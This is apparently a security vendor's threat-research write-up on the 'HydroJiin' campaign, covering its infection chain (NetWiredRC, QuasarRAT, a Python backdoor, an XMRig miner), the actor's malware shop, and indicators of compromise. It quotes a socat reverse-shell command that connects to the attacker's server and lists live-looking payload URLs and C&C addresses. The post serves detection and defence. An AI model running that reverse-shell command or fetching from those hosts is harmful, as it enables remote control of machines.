Zscaler ThreatLabZ recently came across an interesting campaign involving multiple infostealer RAT families and miner malware. We’ve dubbed the campaign “HydroJiin” based on aliases used by the threat actor. The threat actor is in the business of selling malware, and lurks around in online forums that are common hangouts for neophyte to mid-level cyber criminals. We speculate that the malware author is running widespread campaigns involving different commodity and custom malware to steal information to sell in underground marketplaces.
Similar to other attacks outlined in the recent ThreatLabZ State of Encrypted Attacks report, this campaign serves as yet another example of the importance of continuous SSL inspection and zero trust policies to prevent initial compromise as well as communication back to C&C servers. While we do not know the impact of this particular campaign, this type of malware is for sale on underground markets to any number of prospective cybercriminals. While not highly sophisticated, this campaign uses a number of different techniques in order to increase chances of successfully infiltrating organizations who do not take proper precautions.
This campaign utilizes a variety of payloads and infection vectors from commodity RATs to custom malware, email spam, backdooring/masquerading as cracked software, and other lures. Listed below are some of the unique aspects of this campaign:
Multilevel infection chain of payloads leading from one to the next
Custom python-based backdoor deployed along with other RATs (Netwired and Quasar)
Python backdoor command checking for MacOS indicating possibility of more cross-platform functionality in the future.
Campaign is related to a threat actor who is also involved in distribution of multiple malicious tools via a dedicated malware e-commerce website
Possibility of backdoored malware payload similar to CobianRAT case
Not rare, but heavy use of pastebin to host encoded payloads
Infection chain
Figure 1: Infection Chain
The infection starts with the delivery of a downloader that downloads multiple payloads. We could not confirm the delivery vector of this downloader but in we suspect the use of spam emails and cracked software as we have seen in earlier campaigns. Once the attackers achieve initial compromise, the downloader downloads three files:
Injector - Used as a loader to inject downloaded payloads into legitimate processes.
Netwired RAT - A commodity RAT malware used to control the infected system and steal information.
DownloaderShellcode - Obfuscated Meterpreter-based shellcode to download further payloads.
A Pyrome python backdoor is downloaded by this shellcode. This will also download socat and xmrig miner, and finally xmrig miner downloads another RAT named Quasar.
Each payload and its functionality is explained below.
1 Analysis of downloader payload
First, the downloader downloads a payload from pastebin and saves to %TEMP% path, with randomly generated names. The payload hosted on pastebin is encoded in base64 with the text string reversed.
Figure 2: Downloading encoded payload from pastebin
The downloaded malware is an injector. It downloads two more payloads and passes an argument to the first payload for injection.
Figure 3: Passing payloads to injector
Payloads are then downloaded from:
xmr-services[.]com/C/ABAGFBBEBDBCDBFCAEGBEEBAAB_B__DFECBAGGDEBEFD_EDCCBAEFEE.txt - Shellcode Downloader
pastebin[.]com/raw/G0jcGs79 - NetwiredRC
The payloads are also similarly string reversed after base64 encoding.
1.1 NetWiredRC
The second payload in this case, hosted on pastebin, is a commodity malware known as NetWiredRC. NetWiredRC is a publicly available RAT sold by World Wired Labs, active since at least 2012. Adversaries often use spam mails and phishing emails to distribute NetWiredRC. In the wild, it has been seen that NetWireRC is also used by APT threat actors. Netwired’s main focus is to gain unauthorized control on the victim machine, steal stored credentials, and perform keylogging activity. This malware has had multiple version updates with bug fixes and new functionality. This sample will communicate with beltalus.ns1[.]name:8084 for further commands.
Configuration extracted from Netwire RAT::
{'Domains': ['beltalus.ns1[.]name:8084'], 'Proxy Server': 'Not Configured', 'Password': b'Volve', 'Host ID': b'Loader-%Rand%', 'Mutex': b'mKsWHTbK', 'Install Path': b'-', 'Startup Name': b'-', 'ActiveX Key': b'-', 'KeyLog Dir': b'%AppData%\\Logs_temp\\', 'Proxy Option': 'Direct connection', 'Copy executable': False, 'Delete original': False, 'Lock executable': False, 'Registry autorun': False, 'ActiveX autorun': False, 'Use a mutex': True, 'Offline keylogger': True}
1.2 Shellcode Downloader
The first of the two downloaded payloads is a Metasploit Shikata Ga Nai Encoder encoded shellcode capable of downloading another payload from: r3clama[.]com/files/chrome.exe.
PDB path embedded inside binary: C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb
The shellcode downloader downloads the following payloads:
r3clama[.]com/files/socat.zip : Socat tool
r3clama[.]com/files/services.exe : Miner Dropper
1.2.1 PyInstaller Payload
The payload downloaded from r3clama[.]com is a Python-based malware bundled using pyinstaller. Capabilities of this payload include:
Persistence using Run key.
Download, save and extract socat.zip from https://r3clama[.]com/files/socat.zip.
Download monero miner exe from https://r3clama[.]com/files/services.exe which runs and further downloads QuasarRAT.
Start network communication thread.
Figure 4 : Configuration settings of malware
Network Communication
The malware next communicates with C&C server at IP '193.218.118[.]190' and port 8266, first by sending a key to the server and then waiting for .json commands. Commands supported by this malware include:
w0rm
url
upload
Figure 5 : Commands support by python backdoor
Command 'url' and 'upload'
Both url and upload commands are supported only for Windows OS—on any other platform these commands are ignored. Each of these commands is basically the same, and will download and save a payload from specified url. Files are saved under a newly created directory under %temp% with 16-character random names. There are only two differences:
In the case of upload, the downloaded file is saved at %temp%/upload and in case of url the file is saved at %temp%/userbin.
The url command also executes the file in addition to downloading it while the upload command does not.
Command 'w0rm'
The w0rm command is supported on two platforms - Windows and MacOS. On receipt of this command, socat runs with following command line:
"socat OPENSSL:193[.]218[.]118[.]190:4442,verify=0 EXEC:{OS Command}"
OS Command
Windows : 'cmd.exe',pipes
MacOS : /bin/bash
And sends hostname+’$>’ back to C&C over socket.
In short, this command provides a reverse shell on the system to the attacker through socat.
1.2.1.1 Socat
Socat is an advanced multipurpose data relay tool. It supports a plethora of protocols. Below is the description from its creators:
“socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of these. These modes include generation of "listening" sockets, named pipes, and pseudo terminals.” - README
1.2.1.2 Miner Dropper
This is again a .Net based malware. It includes a monero miner binary and all the dll dependencies required by a monero miner executable. It will drop and run the miner payload. Then, it downloads and runs an additional payload, again from pastebin.
Here is the Miner Dropper sequence:
Installs miner executable and dependency files.
Figure 6: Installing xmrig miner dependency files
Waits for idle before starting miner.
Figure 7: Checks if system is Idle before starting miner
CheckActive checks if the miner process is already running, if not then it is started by StartFiles.
Figure 8: Running miner executable with required arguments.
Downloads Quasar RAT payload from (https://pastebin[.]com/raw/khzLqKyN) after starting miner:
Figure 9: Downloading another payload(QuasarRAT)
This miner could be the MinerGate Silent Miner sold on the threat actor’s malware shop. If our assumption is true, there is another possibility of that miner being backdoored, similar to an old case of Cobian RAT, piggybacking on client malware operators to distribute his own RATs. Unfortunately, it is not possible to assert the assumption without access to the builder.
1.2.1.2.1 QuasarRAT
QuasarRAT has been active since at least 2015. Quasar is an open-source project written in .Net framework and freely available to the public. This means anyone can take the code and use it freely, with or without modification. Hence, this malware has become quite popular among cyber criminals. It has been used in various campaigns from mass spam campaigns to targeted attacks. The sample used in this campaign was version 1.3, which has been used in a number of past campaigns.
Configuration of QuasarRAT
Version: "1.3.0.0"
C&C : "beltalus.ns1[.]name:8082;"
Filename: "Client.exe"
Mutex: "QSR_MUTEX_NJPXiF1GKqO6Y3uwjn"
The C&C address used to control the Python backdoor and socat reverse shell is historically known to host C&C servers for many other malwares. Here is list of some malware and corresponding ports used to host C&C servers in the past:
IP
Port
Malware
193.218.118.190
8266
Python backdoor
193.218.118.190
4442
Socat listener OPENSSL
193.218.118.190
1111
NjRAT
193.218.118.190
2407
QuasarRAT
193.218.118.190
8050
Nanocore
Threat Actor HydroJiin
We believe this campaign is run by a threat actor known by the aliases ‘Hydro’ and ‘JiiN’. The threat actor is active on forums such as hackforums[.]net since 2010 and on YouTube at least since 2007. Initially the actor was involved with game mods and cracks, and eventually moved into malware space. We, with high confidence, believe that this actor is from a French-speaking region.
By the other alias JiiN, the threat actor runs a malware shop called JiiN shop at “xmr-services[.]com”. Based on the two aliases, we are calling this campaign and actor HydroJiin.
We are attributing this campaign to HydroJiin with high confidence due to following reasons:
JiiN shop(Xmr-services) is used in this campaign.
JiiN shop(Xmr-services) sells malware tools which Hydro makes videos about.
This campaign downloads an encrypted payload from paste by user Hydro59.
All of the above indicates the relation between HydroJiin, this campaign, and xmr-services.
Malware Shop
The website called “JiiN shop” is based on the username of malware developer/seller and hosted at “xmr-services[.]com.” It is used to advertise and sell different malware products. The threat actor is using https://shoppy[.]gg for handling cryptocurrency payments. He is also selling some additional stuff on shoppy.
Figure 10: JiiN Shop
Malware sold on this website includes:
Minergate silent miner - A configurable miner tool to mine multiple cryptocurrencies on CPU or GPU hidden from the user. Comes with a builder with options for obfuscation, persistence, etc.
Coak Crypter - As the name implies, a packer tool to obfuscate other malware to make them undetectable.
NiiJ Stealer - A very basic stealer to steal passwords from popular tools like Firefox, Opera, Chrome, FileZilla, etc and send to the C&C panel.
INK Exploit - Claims to make malware FUD, but provides no details about the specific exploit.
The Campaign
The infection cycle and malware payloads discussed above are just a part of an ongoing campaign. The campaign has been going on since at least September 29th, 2020. The source website for this campaign is also serving other payloads which led us to more domains and payloads. Covering the whole campaign is out of scope for this blog post. But we are providing some details we have noticed. And a non-exhaustive list of malicious websites serving malwares, C&C domains is also included in the IoC section.
Most of the domains as well as served file names follow a pattern. Domains are mostly registered using namecheap.
Domain Pattern:
[a-z]{4,8}\d{2,4}[a-z]{0,2}.xyz
E.g
pzazmrserv194[.]xyz
mpzskdfadvert329[.]xyz
hklkxadvert475[.]xyz
Zgkstarserver17km[.]xyz
Filename pattern example
Malware Family
atx111.exe
SmokeLoader
socks111.exe
SystemBC
tau111.exe
Tauras Stealer
lkx111
Roger Ransomware
lb777
Lockbit ransomware
void.exe
Downloader
desk
Anydesk
Conclusion
The threat actor HydroJiin has been in the malware business for some time now. He is selling multiple malware types along with running his own campaigns. The malware payload download stats from pastebin indicate he is having decent success. This actor might not be highly advanced but he is persistent in his efforts by using various tools, techniques, and methods to increase his chances of success. SSL inspection is advisable to detect and block such threats using SSL to hide their malicious intent. We at ZScaler ThreatLabZ continue to monitor, and strive to protect our customers from, all levels of threats.
Detection
Figure 11: Zscaler Cloud sandbox report flagging malware
In addition to sandbox detections, the Zscaler Cloud Security Platform detects indicators at various levels:
Win32.Backdoor.NetWiredRC
Win32.Downloader.NetWiredRC
Win32.Backdoor.QuasarRAT
Win32.Coinminer.Xmrig
Win32.Downloader.MiniInject
Win32.Downloader.Pyrome
MITRE ATT&CK
ID
Tactic
Technique
T1059
Command and Scripting Interpreter: Windows Command Shell
Execute reverse shell commands
T1555
Credentials from Password Stores
Mentioned RAT functionality
T1573
Encrypted Channel: Symmetric Cryptography
Encrypt the communication between the victim and the remote machine
T1105
Ingress Tool Transfer
Downloads the Miner and RAT on the victim machine
T1056
Input Capture: Keylogging
Mentioned RAT functionality
T1112
Modify Registry
Modify Run entry in registry
T1090
Proxy
Quasar uses SOCKS5 to communicate over a reverse proxy
T1021
Remote Services: Remote Desktop Protocol
Quasar module to perform remote desktop access
T1053
Scheduled Task/Job: Scheduled Task
Establish persistence by creating new schtasks
T1082
System Information Discovery
Quasar and NETWIRE both RAT having this feature to discover and collect victim machine information.
T1125
Video Capture
Mentioned RAT functionality
T1113
Screen Capture
Mentioned RAT functionality
T1132
Data Encoding
Downloaded Base64 encoded file
T1496
Resource Hijacking
Install XMRig Miner on victim machine
T1027
Obfuscated Files or Information
XOR operation is implemented to decrypt the file
IOCs
Filename
Md5
Malware
Void.exe [ parent file]
656951fa7b57355b58075b3c06232b01
Win32.Downloader.MiniInject
ABAGFBBEBDBCDBFCAEGBEEBAAB_B__DFECBAGGDEBEFD_EDCCBAEFEE.txt
9c50501b6f68921cafed8af6f6688fed
Win32.Downloader.NetWiredRC
chrome.exe
294fd63ebaae4d2e8c741003776488c2
Win32.Downloader.Pyrome
Service.exe
e9bccc96597cc96d22b85010d7fa3004
Win32.Coinminer.Xmrig
khzLqKyN
3bb3340bccdab8cde94dd1bf105e1d3e
Win32.Backdoor.QuasarRAT
G0jcGs79
F094D8C0D9E6766BCCF78DA49AAB3CBC
Win32.Backdoor.NetWiredRC
URLs
Malware
gzlkmcserv437[.]xyz/void.exe
Win32.Downloader.MiniInject
r3clama[.]com/files/socat.zip
Socat tool
r3clama[.]com/files/services.exe
Win32.Coinminer.Xmrig
pastebin[.]com/raw/khzlqkyn
Win32.Backdoor.QuasarRAT
pastebin[.]com/raw/G0jcGs79
Win32.Backdoor.NetWiredRC
C&C:
C&C
Malware
beltalus.ns1[.]name:8084'
NetWiredRC
82.65.58[.]129
NetWiredRC
xmr.pool.minergate[.]com
XMRIG Miner
beltalus.ns1[.]name:8082
QuasarRAT
193.218.118[.]190:8266
Pyrome backdoor
193.218.118[.]190:4442
Socat
193.218.118[.]190:8266
Python backdoor
193.218.118[.]190:4442
Socat listener OPENSSL
193.218.118[.]190:1111
NjRAT
193.218.118[.]190:2407
QuasarRAT
193.218.118[.]190:8050
Nanocore
↧